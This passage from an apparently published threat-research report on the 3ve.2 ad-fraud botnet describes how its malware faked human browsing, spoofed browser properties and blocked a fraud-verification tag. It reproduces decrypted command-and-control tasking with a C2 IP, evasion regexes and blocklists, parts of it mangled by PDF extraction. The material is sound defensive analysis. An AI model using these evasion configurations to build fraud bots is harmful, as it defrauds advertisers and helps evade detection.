be a way to create processes on this desktop due to the absence of a running instance of Explorer.
Fake Browsing Behavior
To avoid detection, 3ve.2 exhibited a human-like behavior through mouse movements and clicks, occasionally blocked
verification libraries (by leveraging two separate techniques), while also generating false, but seemingly organic, data.
Mouse movements
We’ve seen 3ve.2 scroll around the screen or move the mouse in a simplified “human” manner.
Examples of mouse movements from 3ve.2
28. The Hunt for 3ve 28
Patching functions
The malware also patched some functions that are usually implemented in native code. For example, it spoofed various
items related to the environment such as the AudioContext values (see code used for AudioContext spoofing below). It also
used JavaScript to find links on the page on which to click. These snippets of code were used to override the browser’s
built in functionality, so that the C2 could control what the browser reports to the site. So instead of running a native code
function from the JavaScript engine, the malware’s patched version is executed to let the bot look more organic.
JavaScript code that patched properties such as maxChannelCount in the browser
29. The Hunt for 3ve 29
Playing media
The malware contained an interesting code snippet, a few lines of JavaScript, that was used to play media on a page.
The malware authors included a few try catch statements which loop through all of the elements on a page named either
‘embed’, ‘object’, or ‘video’ and then tried to call play(), playVideo(), or start() on them. It did so to try to maximize the payout
for each site visit by attempting to play the respective video ads.
JavaScript to automatically play video ads
30. The Hunt for 3ve 30
Tag evasion
3ve.2 used a regular expression matching technique for blocking unwanted assets on a page. This was done through a
variable in the C2’s response named bbb_l_m (more details below). When a website was loaded, the malware looped through
every URL in the site and passed each of them to a function that checked the URL against a regex to determine whether a
resource should be blocked or allowed. For example, this technique was used to block the White Ops JavaScript tag.
If the URL matched the regular expression, the function would return 1, and the URL being operated upon would be replaced
with the string “none,” thereby blocking the resource from ever being downloaded or executed. Otherwise, If the URL didn’t
match, the function returned 0 and the resource was not blocked.
Another method of evasion that 3ve.2 used was a string blacklist based on the components of a resource found in the
bbb_j_m C2 variable. If any of these strings were identified within a resource (e.g., JavaScript or HTML), the respective
resource on the website 3ve.2 visited wouldn’t get rendered or executed. For example, bbb_j_m contained strings from the
White Ops JavaScript tag, and strings related to crypto-jacking such as cryptonight, CoinHive, CryptonightWASMWrapper,
and abortOnCannotGrowMemory. 3ve.2 prevented crypto-jacking scripts from executing because they might lead to
inadvertent detection of the malware.if a user noticed noticed their computer was running slower, hotter or noisier (due
to fans spinning up) than normal due to the cryptocurrency mining running in the background.
Non-counterfeit domains browsing
Finally, in addition to visiting counterfeit websites, 3ve.2 instructed residential bots to visit legitimate domains. This was
likely done to participate in traffic-selling schemes, and to better blend in with organic traffic by gathering cookies from
legitimate websites.
C2 instructions
3ve.2’s ad-fraud module requested new tasks from the command & control servers every few minutes. The following
request sent from the bot to the servers provides details about the infected machine’s state. For example, it includes
a unique bot id, a bot version, language, operating system version.
Function’s assembly to determine whether a resource should be blocked or allowed
mode=3&UID= &clicks=3&uknerr=0&referr=0&hproc=0&fcproc=0&fproc=0&fthr1=0&fthr2=0
&rlimit=0&tserro=0&terr=0&csproc=0&sserr1=0&sserr2=0&tvc=1&refh=yes&v=2.1.1.2&acptlng=en-
US&chrome=1&w_cont=7&cont_err=1&lastcie= &os_number=6.1&fd=
3ve.2’s ad fraud task request (decrypted and anonymized; obtained via API hooking)
31. The Hunt for 3ve 31
The C2 replies with a list of tasks to perform in the next time slot. Each of these tasks instructs 3ve.2’s embedded
browser to visit a given URL with a custom environment, which e.g. includes a fake user agent, screen resolution,
plugins, and a regular expression of JavaScript sources to prevent from loading (mainly for blocking verification
code and browser-based crypto mining).
3ve.2 tasking the embedded browser to visit a legitimate URL (plaintext extracted via API hooking; the real domain
has been replaced with “example.com”). White Ops code is blocked (details have been redacted).
RESP:OK|http://example.com/|<>|http://example.com/|<>|0:00:00:00:00:00:00:00:00:
00::||scrl_cfg:000000-00000-68:scrl_cfg|fcs_cfg:3000-2194:fcs_cfg||p_hhw:100:p_hhw|w_w_
perc:5:w_w_perc|scrtype:2:scrtype|setcpu:1:setcpu|veryfast:93:veryfast|lowl_c:0:lowl
_ c | m i n m s : 4 4 : m i n m s | h s t _ c o u n t : 4 : h s t _ c o u n t | c h e c k j s c m d : 1 : c h e c k _ j s c m d | d o m s _
spoof:coinhive.com>0||coin-hive.com>0||jsecoin.com>0||reasedoper.pw>0||mataharirama.
xyz>0||listat.biz>0||lmodr.biz>0||minecrunch.co>0||minemytraffic.com>0||crypto-loot.com
>0||2giga.link>0||ppoi.org>0||coinerra.com>0||coin-have.com>0||kisshentai.net>0||
miner.pr0gramm.com>0||kiwifarms.net>0||anime.reactor.cc>0||joyreactor.cc>0||
kissdoujin.com>0||minero.pw>0||coinnebula.com>0||afminer.com>0||coinblind.com>0||
webmine .cz>0||monerominer.rocks>0||cdn.cloudcoins.co>0||coinlab.biz>0||
papoto.com>0||edgeno.de>0||jyhfuqoh.info>0||ads-miner.appspot.com>0||www.hashing.
win>0||:doms_spoof||bbb_l_m:^http[^?&]{1,128}/█████████{██}/(█████████████).js||
:bbb_l_ m| bbb_j_m:cryptonight||CryptonightWASMWrapper||CoinHive||███████████████████
||█████████████████||:bbb_j_m||force_use_cont_id::44::force_use_cont_id|hos crm:6.1:hos_
crm|hfont_crm:Arial Greek.Arial Cyr.Leelawadee UI Semilight:hfont_crm|flash_p:plugins
pepflashplayer32_28_0_0_126.dll:flash_p|flash_v:28.0.0.126:flash_v|enable_ex_5:1:enable_ex_5
|setua:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.
3239.84 Safari/537.36:setua|scr_data:1920x1080-1920x1040-1-5-0-1.50:scr_data|spf_c_dta:9
:spf_c_dta|spf_s_dt:119:2:0.01:48000:spf_s_dt|srtds:,@d:1:0,c:2:1,g:3:0,g:4:2,
g:5:3,@,#00000000000000000000:srtds|spf_r_dt:83.72.1:spf_r_dt|spf_cc_dt:
4:spf_cc_dt|gl_dat:packe[...]==:gl_dat|jsshh:553000000:jsshh|mrysf:2.0:mrysf|sltd:
4447:sltd|sbyd:0:sbyd||hook_l_mpg:1:hook_l_mpg|enable_ex_2:1:enable_ex_2|dsth:1:dsth||<>
As we described before, 3ve.2 would intermix browsing legitimate websites with counterfeit ones. 3ve.2 instructed the
embedded browser to visit a redirector URL, which would issue an HTTP 302 toward the home page of the spoofed
site, passing its IP address as a parameter. The embedded browser would update its DNS records to match the given IP
with the spoofed site, which it would then visit. The spoofed site then either directly served the ad fraud payload in the
response or would 302 redirect the browser again to the final ad fraud URL, which is a URL that existed on the legitimate
version of the site. For spoofed news sources, this final ad fraud URL was usually the URL of a news article.
32. The Hunt for 3ve 32
Diagram: How 3ve.2 operates
3ve.2 tasking the embedded browser to visit a spoofed site (plaintext extracted via API hooking)
R E S P : O K | h t t p : / / 1 8 8 . 2 1 4 . 3 0 . 9 2 / a p i / g e t l i n k s . p h p ? c l i c k = & t y p e = v s p o o f _
domain= . .com&land_ip= &group= &subid= &uid= |<>|htpp:
// . .com/|<>|0:00:00:00:00:00:00:00:00:00::|od_od: . .com:od
:fcs_cfg||p_hhw:100:p_hhw|w_w_perc:5:w_w_perc|scrtype:0:scrtype|setcpu:1setcpu|ver
yfast:107:veryfast|lowl_c:0:1owl_c|minms:27:minms|hst_count:18:hst_count|check_jscm
d:1:check_jscmd|doms_spoof:coinhive.com>0||coin-hive.com>0||jescoin.com>0||reasedop
er.pw>0||matahariama.xyz>0||miner.pr0gramm.com>0||kiwifarms.net>0||anime.reactor.cc>0||
fic.com>0||crypto-loot.com>0||2giga.link>0||ppoi.org>0||coinerra.com>0||coin-have.c
om>0||kisshentai.net>0||miner.pr0gramm.com>0||kiwifarms.net>0||anime.reactor.cc>0||
joyreactor.cc>0||kissdoujin.com>0||minero.pw>0||coinnebula.com>0||afminer.com>0||co
inblind.com>0||webmine.cz>0||monerminer.rocks>0||cdn.cloudcoins.co>0||coinlab.biz>
0||papoto.com>0||edgeno.de>0||jhynfuqoh.info>0||ads-miner.appspot.com>0||www.hashing
.win>0||:doms_spoof||bbb_1_m:^http[^?&]{1,128]/ { }/(
).js||:bbb_1_m||bbb_j_m:cryptonight||CrytonightWASMWrapper||CoinHive||
||bbb_j_m||force_use_
cont_id::63::force_use_cont_id|hos_crm:10.0:hos_crm|hfont_crm:CambriaMath.Stika
Display.Sitka
Display:hfont_crm|flash_p:pluginspepflashplayer32_23_0_0_126.dll:flash_p|flash_v:2
8.0.0126:flash_v|enable_ex_5:1:enable_ex_5|setua:Mozilla/5.0 (Windows NT10.0;
WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.40
Safari/537.36:setua|scr_data:1600x900-1600x860-1-5-0-1.00:scr_data|spf_c_dta:12:spf
_c_dta|spf_s_dt:73:2:0.0000000000000.00000:spf_s_dt|srtds:,@d:1:0,c:2:1,g:3:0,@,#00
0000000000000000000000:srtds|spf_r_dt:28.50.0:spf_r_dt|spf_cc_dt:2:spf_cc_dt|gt_dat:
pack[...]:gl_dat|jsshh:747000000:jsshh|mrysf:2.0:mrysf|sltd:-51416:sltd|sbyd:0:sby
d||hook_1_mpg:1:hook_1_mpg|enable_ex_2:1:enable_ex_2|dsth||<>
4. Ad-fraud URL leads
to counterfeit page
with video ad
Infected computer
1. Client pings server
which replies with
ad-fraud config
Kovter C2
2. 302 redirect to
counterfeit website
Redirection server
3. Counterfeit website
sends 302 redirect to
ad-fraud URL
Counterfeit website
33. The Hunt for 3ve 33
Additionally, 3ve.2’s ad fraud module would periodically send updates about the host’s available resources and
anti-malware software. Every few hours, 3ve’s ad fraud module would also attempt to self update.
3ve.2’s status update (plaintext extracted via API hooking)
mode=1&UID= &OS=Win 7, SP1 IL:3&OS bit= x32&v =2.1.1.2 &aff_id =519&oslang=ENU&
gmt=GMT -08:00& threads =1&online = &cont_err =1&chrome =1&f d=
f&exet=ffile&fcl=no&totalram=1023&loadram=191&freeram=465&cpuload=8&selfcpu=7&th
rdscpu=0&ccpu=1&isafk=no&te=0&antivirus=-&firewall=-&antispyware=Windows Defender::
Parameters explained
od_od: This parameter defines the domain to spoof. Spoofing is done by passing a domain name as the host header to an IP
address unrelated to the domain.
fd_fd: IP address to browse to.
setcpu: A value used to patch the JavaScript environment. Specifically patched window.navigator.hardwareConcurrency
value which returns the number of logical cores in the system. Has been observed to be set to 1, 2, or 4.
scrl_cfg: Appears to be a “scroll config” however we have not determined exactly what the value will control.
doms_spoof: This value is a long list of domain names delimited by >0|| which is not used in fraud operations. It is meant to
throw off an analyst by making them think it’s being used for cryptojacking or by wasting their time if they choose to dive into
this domain list.
bbb_l_m: This is a regular expression used to block unwanted resources from being downloaded on a site. This value has
been a static value during our analysis and will match the White Ops client tag format. This means that the vast majority of
White Ops JS tags will be blocked before the HTTP GET is ever requested to our tag.
bbb_j_m: This is a list of blacklisted strings. Any file containing these strings will not be executed or rendered.
scr_data: Screen data (1366x768-1366x728-1-5-0-1.00) where 1366x768 is the spoofed resolution of the screen, 1366x728
is the real resolution of the window, and 1.00 is the scale factor.
setua: It contains the User-Agent string to use in the browsing session.
spf_s_dt: This most likely stands for spoof sound data. An example of this would be 184:2:0.01:48000 where 2 is the channel
count and 48000 is the sample rate.
c_dir: Points to a cache directory within the browsers folder. Each browsing session appears to get a new cache directory.
34. The Hunt for 3ve 34
Geographic distribution
3ve.2’s operators took great care in trying to prevent ad networks from noticing their illicit activity. This is why, for
example, 3ve.2 malware only fully executed in countries where organic Internet users are likely to be browsing the
same premium sites 3ve is counterfeiting, including the US, Canada, and the UK. 3ve’s victim population is shown
in the figure below.
Heat map of the residential computers infected with 3ve.2 botnet around the world
—red indicating the highest concentration of computers, green the lowest
35. The Hunt for 3ve 35
Infected IPs and churn rate
Number of IPs infected with the malware used by 3ve.2
3ve.2 had roughly 700,000 infections at any given point in time that were actively generating ad fraud. These IPs would
frequently change due to ISPs IP rotation (natural churn), new infections, and clean-ups. As a result, a third of those IPs
would be replaced by new ones every 4 weeks.
3ve.3
The final 3ve-associated sub-operation was the least sophisticated of the three in terms of the approach it used for IP
exit nodes. 3ve.3 used other data centers as proxies instead of residential computers, tunnelling fraudulent traffic out
of anywhere between 15,000 and 20,000 IP addresses. Using data centers instead of computers made 3ve.3’s bot
traffic more likely to be detected, but their strategy still offered its operators a good degree of agility by allowing them
to find new data centers quickly when previously used data centers were blocked. We’ve found that this sub-operation’s
architecture is similar to that of 3ve.1. The sub-operation was focused on a range of ad fraud approaches, including
video, display, and click fraud.
Despite its lack of sophistication relative to other 3ve sub-operations, 3ve.3 still had a fairly complex backend, relying
on rogue DNS servers that rendered the content pages and resolved legitimate domains to the IP address of counterfeit,
3ve-controlled sites. Additionally, 3ve.3 used sophisticated evasion techniques like tag evasion, similar to both 3ve.1
and 3ve.2. However, 3ve.3’s key difference from the other sub-operations is in its exit node layer, which relied somewhat
rudimentarily on data centers rather than residential computers. While this enabled them to look like tens of thousands
of users viewing ads, it also made them far easier to detect.
Infected IPs % IPs churned (since beginning of month)
800,000 50%
600,000
40%
400,000
30%
20%
200,000
10%
0
2/4/2018
3ve.2 Infected IPs and churn
2/11/2018 2/18/2018 2/25/2018
0